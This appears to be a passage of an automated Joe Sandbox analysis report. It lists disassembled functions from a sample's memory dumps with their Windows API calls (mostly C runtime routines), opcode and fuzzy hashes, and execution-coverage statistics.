                                                                        • Opcode ID: f724551797df3d079ec7630f68a98d8fc8fbe16478561887b9490916555449d7
                                                                        • Instruction ID: 9a9bccce28412c8eff8714e13637333a38800fa4fdb79fe6dd24b8a7a3408847
                                                                        • Opcode Fuzzy Hash: f724551797df3d079ec7630f68a98d8fc8fbe16478561887b9490916555449d7
                                                                        • Instruction Fuzzy Hash: 30F02B7174020D26DB244C7C9C41BAEB79ACBC2630F158369B925C72D4E5708C454291
                                                                        Function 00C2CFFC Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 489 c2cffc-c2d019 491 c2d01e-c2d021 489->491 492 c2d023-c2d026 491->492 493 c2d030 491->493 492->493 494 c2d028-c2d02e 492->494 495 c2d032-c2d04d LoadCursorW call c2d17c 493->495 494->495 495->491 498 c2d04f-c2d053 495->498
                                                                        APIs
                                                                        • LoadCursorW.USER32(00000000,00000000,?,?,?,00C1F730,00C2CB5F,?,?,00000000,?,00B993F0), ref: 00C2D036
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000B4D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_b4d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: CursorLoad
                                                                        • String ID:
                                                                        • API String ID: 3238433803-0
                                                                        • Opcode ID: 594fe75da452fb86f21a349871e2d216a89d14f617c79b6fa7bd71b23a0fd236
                                                                        • Instruction ID: 249875b5b184149af2bacb2aa1d2f8e9d418c61da43a1e4750b660ed90a4cab2
                                                                        • Opcode Fuzzy Hash: 594fe75da452fb86f21a349871e2d216a89d14f617c79b6fa7bd71b23a0fd236
                                                                        • Instruction Fuzzy Hash: CAF0A751A0525017A660593D6CC0F6EB244CBD6731F304336F93F976E1CA211C461750
                                                                        Function 00B894B0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 499 b894b0-b894f7 KiUserCallbackDispatcher
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00B894EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000B4D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_b4d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: 5535dc279ff1e877384e686dd9023c36d18ece0e40eb3ee833c40a88ae434141
                                                                        • Instruction ID: e0bbe715bca3811110881742a92ef003db1fcb23f4917bcbe1fd8e336695c67c
                                                                        • Opcode Fuzzy Hash: 5535dc279ff1e877384e686dd9023c36d18ece0e40eb3ee833c40a88ae434141
                                                                        • Instruction Fuzzy Hash: D4F0DA762047119FC310DF5CC88494BB7E9EF89259F044A59F986DB351C771E814CB92
                                                                        Function 01162BBE Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4463870463.0000000001162000.00000020.00000001.01000000.00000007.sdmp, Offset: 01162000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_1162000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: =
                                                                        • API String ID: 0-2322244508
                                                                        • Opcode ID: 8747d4d4a66007d555ded7271ff69db9a91538b04c7af679efe992322c3592e5
                                                                        • Instruction ID: 28de614562fc74e0ab731e6e8400da1cbec864be83a84a95c5042968d3720471
                                                                        • Opcode Fuzzy Hash: 8747d4d4a66007d555ded7271ff69db9a91538b04c7af679efe992322c3592e5
                                                                        • Instruction Fuzzy Hash: 6EF05C11968146DFC721CA3484C0B777BE1CF95351F21976CB49A8B681D27A4C0AE610
                                                                        Function 00D478C9 Relevance: .0, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4463870463.0000000000D47000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D47000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_d47000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9a9670c049b1ee754d8e48c2c420078231842d0213a469bb1e1e388e4a719760
                                                                        • Instruction ID: 66d319f7d3a0c5efd40dae16d372b4e5743597afe982b0dbe8425b693505ba46
                                                                        • Opcode Fuzzy Hash: 9a9670c049b1ee754d8e48c2c420078231842d0213a469bb1e1e388e4a719760
                                                                        • Instruction Fuzzy Hash: 05D05E31764012CFC702DF08DCC4E9C7369AF163057A44091F548CB65AC320A817CB80

                                                                        Non-executed Functions

                                                                        Function 00C7F18A Relevance: 16.8, APIs: 11, Instructions: 347COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000100,?,?,?,?,?,?), ref: 00C7F25A
                                                                        • _malloc.LIBCMT ref: 00C7F293
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00000000,00C79E02,?,?), ref: 00C7F2C6
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00C79E02,?,?), ref: 00C7F2E2
                                                                        • MultiByteToWideChar.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00C7F31C
                                                                        • _malloc.LIBCMT ref: 00C7F355
                                                                        • __freea.LIBCMT ref: 00C7F3AD
                                                                        • __freea.LIBCMT ref: 00C7F3B6
                                                                        • _malloc.LIBCMT ref: 00C7F46B
                                                                        • _memset.LIBCMT ref: 00C7F48D
                                                                        • __freea.LIBCMT ref: 00C7F4D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__freea_malloc$_memset
                                                                        • String ID:
                                                                        • API String ID: 3920393152-0
                                                                        • Opcode ID: 0de52c12a0e513ca47024b8f87f90e9ebe59b9d00e482156c1ac46fbe9fb12a9
                                                                        • Instruction ID: fde2546d469af2a3b13b2e5424b9babe7dc7dc0969254f4e963df7bd67f6bdb0
                                                                        • Opcode Fuzzy Hash: 0de52c12a0e513ca47024b8f87f90e9ebe59b9d00e482156c1ac46fbe9fb12a9
                                                                        • Instruction Fuzzy Hash: 3BB18F7280011AEFDF219FA4CCC18AE7BA5FF48354F14853EF929A6161D7358E52EB60
                                                                        Function 00C7B99D Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 114COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsSetValue.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C7A861), ref: 00C7BA60
                                                                        • __init_pointers.LIBCMT ref: 00C7BA6A
                                                                        • __mtterm.LIBCMT ref: 00C7BB20
                                                                          • Part of subcall function 00C7B649: TlsFree.KERNEL32(00C8C65C,00C7A8F6), ref: 00C7B674
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: FreeValue__init_pointers__mtterm
                                                                        • String ID: FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                        • API String ID: 3928193026-1030280904
                                                                        • Opcode ID: 1991ad417bacbd9d2802aaa7dad2636fce703af6eeaaef0768100332f19d3d18
                                                                        • Instruction ID: eec5102a1909b743b3cd3cdcbdeb5b4068284b70a383b86518a77f6d382c5892
                                                                        • Opcode Fuzzy Hash: 1991ad417bacbd9d2802aaa7dad2636fce703af6eeaaef0768100332f19d3d18
                                                                        • Instruction Fuzzy Hash: 63318D718007119AC7557B75AD09B5F3BE4ABC4324B20C53FF928D71B2EB748943AB68
                                                                        Function 00C822D3 Relevance: 9.2, APIs: 6, Instructions: 178COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _strlen.LIBCMT ref: 00C82355
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,00C7F75E), ref: 00C82395
                                                                        • _malloc.LIBCMT ref: 00C823A5
                                                                        • _memset.LIBCMT ref: 00C823CD
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,00000000,?,?,?,?,?,00C7F75E,?), ref: 00C823E4
                                                                        • __freea.LIBCMT ref: 00C8246C
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__freea_malloc_memset_strlen
                                                                        • String ID:
                                                                        • API String ID: 3923921168-0
                                                                        • Opcode ID: f9f579952a43ae0d88b08964d036b2908c402aefef08478c8f4afd124e883fd8
                                                                        • Instruction ID: db0e992b003217ba4e12b672d0c1fca4e04dfca883402190996ad56d5dedcbac
                                                                        • Opcode Fuzzy Hash: f9f579952a43ae0d88b08964d036b2908c402aefef08478c8f4afd124e883fd8
                                                                        • Instruction Fuzzy Hash: 15516E31900219AECF21AFA5DC48DEFBBB9EF89724F204119F524B6160D7359D41DBB8
                                                                        Function 00C7ABAA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: String___crt$Type_memset
                                                                        • String ID:
                                                                        • API String ID: 1957702402-3916222277
                                                                        • Opcode ID: 986dee7bea969a3714e358a5090ab71fdb8d9d34e61384a774763969e3de55ca
                                                                        • Instruction ID: bf848ec0511de1e0f192c656ad752c8251d9f0b684f327dedab134429517a327
                                                                        • Opcode Fuzzy Hash: 986dee7bea969a3714e358a5090ab71fdb8d9d34e61384a774763969e3de55ca
                                                                        • Instruction Fuzzy Hash: 664104B110075C6FDB328B249C95FFF7BE8AB45304F2484E8E59A87182D2729B459F61
                                                                        Function 00C84AC0 Relevance: 7.8, APIs: 5, Instructions: 263COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _ValidateScopeTableHandlers.LIBCMT ref: 00C84BC1
                                                                        • __FindPESection.LIBCMT ref: 00C84BDB
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: FindHandlersScopeSectionTableValidate
                                                                        • String ID:
                                                                        • API String ID: 876702719-0
                                                                        • Opcode ID: 7daa07b6a455c31b86b95303fe60a5723d3480313d26232eec387e36e0b94673
                                                                        • Instruction ID: d39e0a17c2c632f636ca62f94a66f8fa6012889354e65f24676a6649920d7c32
                                                                        • Opcode Fuzzy Hash: 7daa07b6a455c31b86b95303fe60a5723d3480313d26232eec387e36e0b94673
                                                                        • Instruction Fuzzy Hash: 0491D572A0061A8BCB18EF59E88076DB7B6FB84319F15413DD825973A1E735ED02CB9C
                                                                        Function 00C7F574 Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00C7F75E,?,?,?), ref: 00C7F61A
                                                                        • _malloc.LIBCMT ref: 00C7F64F
                                                                          • Part of subcall function 00C822D3: _strlen.LIBCMT ref: 00C82355
                                                                          • Part of subcall function 00C822D3: _memset.LIBCMT ref: 00C823CD
                                                                          • Part of subcall function 00C822D3: MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,00000000,?,?,?,?,?,00C7F75E,?), ref: 00C823E4
                                                                        • _memset.LIBCMT ref: 00C7F66F
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,?,?,00000001), ref: 00C7F684
                                                                        • __freea.LIBCMT ref: 00C7F69C
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$_memset$__freea_malloc_strlen
                                                                        • String ID:
                                                                        • API String ID: 574822426-0
                                                                        • Opcode ID: b03797cdf264254de9d84621db7f184553ac7eafa7fa4baa5082a74e655da8aa
                                                                        • Instruction ID: e8b3aeb3899a7fb4fee85d480a75413c3acd4b6fca1b9104cc4dd48cccc620da
                                                                        • Opcode Fuzzy Hash: b03797cdf264254de9d84621db7f184553ac7eafa7fa4baa5082a74e655da8aa
                                                                        • Instruction Fuzzy Hash: 3951907250010AEFDF10AF64DCC29AE7BA9FB08354B14853EF928C7161D731DE629BA0
                                                                        Function 00C84009 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __CreateFrameInfo.LIBCMT ref: 00C84031
                                                                          • Part of subcall function 00C83921: __getptd.LIBCMT ref: 00C8392F
                                                                          • Part of subcall function 00C83921: __getptd.LIBCMT ref: 00C8393D
                                                                        • __getptd.LIBCMT ref: 00C8403B
                                                                          • Part of subcall function 00C7B7E6: __amsg_exit.LIBCMT ref: 00C7B7F6
                                                                        • __getptd.LIBCMT ref: 00C84049
                                                                        • __getptd.LIBCMT ref: 00C84057
                                                                        • __getptd.LIBCMT ref: 00C84062
                                                                          • Part of subcall function 00C839C6: __CallSettingFrame@12.LIBCMT ref: 00C83A12
                                                                          • Part of subcall function 00C8412F: __getptd.LIBCMT ref: 00C8413E
                                                                          • Part of subcall function 00C8412F: __getptd.LIBCMT ref: 00C8414C
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit
                                                                        • String ID:
                                                                        • API String ID: 3174811152-0
                                                                        • Opcode ID: f5730c61f12492576a0eef748da0d4b7c96fa780323b55037cc51f2a27ed6653
                                                                        • Instruction ID: 122a421715192ed4fbdaaa695c492b3103ff7e6536a00760abbab6b782f6bf2b
                                                                        • Opcode Fuzzy Hash: f5730c61f12492576a0eef748da0d4b7c96fa780323b55037cc51f2a27ed6653
                                                                        • Instruction Fuzzy Hash: 3711F6B1C042099FDB04EFA4C986BAD7BB0FF44314F10C469F818A7252EB789A11AB64
                                                                        Function 00978494 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 009784C3
                                                                        • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,00978540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 009784F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000971000.00000020.00000001.01000000.00000007.sdmp, Offset: 00971000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_971000_windows10.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InformationLogicalProcessor
                                                                        • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                        • API String ID: 1773637529-812649623
                                                                        • Opcode ID: 33422deee359ae11425648c061e1e5bb786d0ec9d8b59d0dc3b1dcd677ae6459
                                                                        • Instruction ID: b8b2471d189087220cdcf84447b39896ddc3db897475dc4b42e063e423366a0f
                                                                        • Opcode Fuzzy Hash: 33422deee359ae11425648c061e1e5bb786d0ec9d8b59d0dc3b1dcd677ae6459
                                                                        • Instruction Fuzzy Hash: D7119373E48208AEEB10EBA4DC4AB5EB7E8DB80314F25C0E5F40C92182DF759A808615
                                                                        Function 00978492 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 009784C3
                                                                        • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,00978540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 009784F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000971000.00000020.00000001.01000000.00000007.sdmp, Offset: 00971000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_971000_windows10.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InformationLogicalProcessor
                                                                        • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                        • API String ID: 1773637529-812649623
                                                                        • Opcode ID: 359933d5c716c6fe3d8d4ecd298042ebb2d6ae9b377f8f733b2166840254b838
                                                                        • Instruction ID: b8f67dedddb60dc6f857b824dad06f67c1ee036816438cb70fe0dca4925248f8
                                                                        • Opcode Fuzzy Hash: 359933d5c716c6fe3d8d4ecd298042ebb2d6ae9b377f8f733b2166840254b838
                                                                        • Instruction Fuzzy Hash: 91018473E88208AEEB10EBA08C4AB6EB7EDDB80314F15C0A5F40CD6081EF71DA808614
                                                                        Function 0097C860 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0097C871
                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0097C8CF
                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0097C92C
                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0097C95F
                                                                          • Part of subcall function 0097C81C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0097C8DD), ref: 0097C833
                                                                          • Part of subcall function 0097C81C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0097C8DD), ref: 0097C850
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000971000.00000020.00000001.01000000.00000007.sdmp, Offset: 00971000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_971000_windows10.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Thread$LanguagesPreferred$Language
                                                                        • String ID:
                                                                        • API String ID: 2255706666-0
                                                                        • Opcode ID: b2b42e253ab3a32aa013e25affa429a88c8d471ff2c418362df6d001af0f5bf1
                                                                        • Instruction ID: 611c4fadf09155700dbb28cebb3b0b836aa5d4894e3cfc83ef5fd34ee5db0365
                                                                        • Opcode Fuzzy Hash: b2b42e253ab3a32aa013e25affa429a88c8d471ff2c418362df6d001af0f5bf1
                                                                        • Instruction Fuzzy Hash: A03160B1E0021E9BDB10DFE8C885BEEB3B8FF44310F548169E559E7291D7749A44CB51
                                                                        Function 00C7F5CA Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00C7F75E,?,?,?), ref: 00C7F61A
                                                                        • _memset.LIBCMT ref: 00C7F66F
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,?,?,00000001), ref: 00C7F684
                                                                        • __freea.LIBCMT ref: 00C7F69C
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__freea_memset
                                                                        • String ID:
                                                                        • API String ID: 2568176243-0
                                                                        • Opcode ID: ce43943b9868d0d07ff706dc16f5697e0d9e9d783e2b1ff9a25ee9727d7f8d94
                                                                        • Instruction ID: 998f23053daca967fddf046a5786c9484adf2f06f0e59a402b95a4611c4a84a3
                                                                        • Opcode Fuzzy Hash: ce43943b9868d0d07ff706dc16f5697e0d9e9d783e2b1ff9a25ee9727d7f8d94
                                                                        • Instruction Fuzzy Hash: 1D21507160010AEFDF109F68DCC2AAE3BA9EB14354F158439F919D6161D731DE629BA0
                                                                        Function 00C7B59A Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(00000000,?,00C7B635), ref: 00C7B5AC
                                                                        • TlsGetValue.KERNEL32(00C8C658,?,00C7B635), ref: 00C7B5C3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID: DecodePointer$KERNEL32.DLL
                                                                        • API String ID: 3702945584-629428536
                                                                        • Opcode ID: 3094cd1d2544d07f2a8755f20a72c5377bef8308db81acb2d1ed3a12b8ea416b
                                                                        • Instruction ID: 363727ae34dc969be8efd2c6741dbfa3d8a34e2ae714f0aefa58c68ceea3ac6e
                                                                        • Opcode Fuzzy Hash: 3094cd1d2544d07f2a8755f20a72c5377bef8308db81acb2d1ed3a12b8ea416b
                                                                        • Instruction Fuzzy Hash: 3AF0627060411AAA8F556B26ED81F6B3B9D9F403A07148231FC2DD6160EF30CE0197F8
                                                                        Function 00C7B51F Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(00000000,?,00C7B598,00000000,00C8273C,00C8F6D0,00000000,00000314,?,00C80261,00C8F6D0,Microsoft Visual C++ Runtime Library,00012010), ref: 00C7B531
                                                                        • TlsGetValue.KERNEL32(00C8C658,?,00C7B598,00000000,00C8273C,00C8F6D0,00000000,00000314,?,00C80261,00C8F6D0,Microsoft Visual C++ Runtime Library,00012010), ref: 00C7B548
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID: EncodePointer$KERNEL32.DLL
                                                                        • API String ID: 3702945584-3682587211
                                                                        • Opcode ID: 33863ef9aef063c691fd036e033bc646ab03d18ca80fe029e26bbd7404ff4611
                                                                        • Instruction ID: decf36e1679f282b37378a9f3fc07195287dbc6a5df0706b9c796f1e5c6b9791
                                                                        • Opcode Fuzzy Hash: 33863ef9aef063c691fd036e033bc646ab03d18ca80fe029e26bbd7404ff4611
                                                                        • Instruction Fuzzy Hash: 7DF06270600116AA8B91AB7ADD44F6E3FAD9F453A07148131FC2CE6161EB31DE0187E4
                                                                        Function 00C83D9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: CallFrame@12Setting__getptd
                                                                        • String ID: j
                                                                        • API String ID: 3454690891-2137352139
                                                                        • Opcode ID: 669a8888bf1fcff3379f13a75e8a79c2290ad9751b26e3d1a2780ee6703f8e9e
                                                                        • Instruction ID: 34768605c69c1377b6e797b71aa09bb57387763433b91d38d8097ebb8e8de2ce
                                                                        • Opcode Fuzzy Hash: 669a8888bf1fcff3379f13a75e8a79c2290ad9751b26e3d1a2780ee6703f8e9e
                                                                        • Instruction Fuzzy Hash: 1A11E171904291DFCB12EF69C4443ACBFB0BF05B08F18858AD4A86F283C375AE41DB89
                                                                        Function 00C843B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___BuildCatchObject.LIBCMT ref: 00C843C9
                                                                          • Part of subcall function 00C84324: ___BuildCatchObjectHelper.LIBCMT ref: 00C8435A
                                                                        • _UnwindNestedFrames.LIBCMT ref: 00C843E0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                        • String ID: csm
                                                                        • API String ID: 3487967840-1018135373
                                                                        • Opcode ID: d7cfb688f90cc76fd5960e040264083c7c1c916bb07f4d54eefe1401d8d22a85
                                                                        • Instruction ID: 116f7e2db9370c8f9706dedbdd27c4d7eca74b09611721ea74a5892cb29ffe53
                                                                        • Opcode Fuzzy Hash: d7cfb688f90cc76fd5960e040264083c7c1c916bb07f4d54eefe1401d8d22a85
                                                                        • Instruction Fuzzy Hash: DA01463500010ABBCF166F51CC45EEA3F6AFF08349F008014FD1815120E772DAB1EBA8
                                                                        Function 00C8412F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00C8413E
                                                                          • Part of subcall function 00C7B7E6: __amsg_exit.LIBCMT ref: 00C7B7F6
                                                                        • __getptd.LIBCMT ref: 00C8414C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd$__amsg_exit
                                                                        • String ID: csm
                                                                        • API String ID: 1969926928-1018135373
                                                                        • Opcode ID: 9d7e085454ab6c2d7cb152083fa03de183894ad01705aed6babd743c65a25248
                                                                        • Instruction ID: ec8af4c2312ae967076bc22aa4664b32ac82c1df87cfff25548efeaf567aad7f
                                                                        • Opcode Fuzzy Hash: 9d7e085454ab6c2d7cb152083fa03de183894ad01705aed6babd743c65a25248
                                                                        • Instruction Fuzzy Hash: 13014B368002069EDF38FFA4D4886ADB7B9AF20319F14446DE06096292DB309AC0DB59

                                                                        Execution Graph

                                                                        Execution Coverage:1.4%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:246
                                                                        Total number of Limit Nodes:25
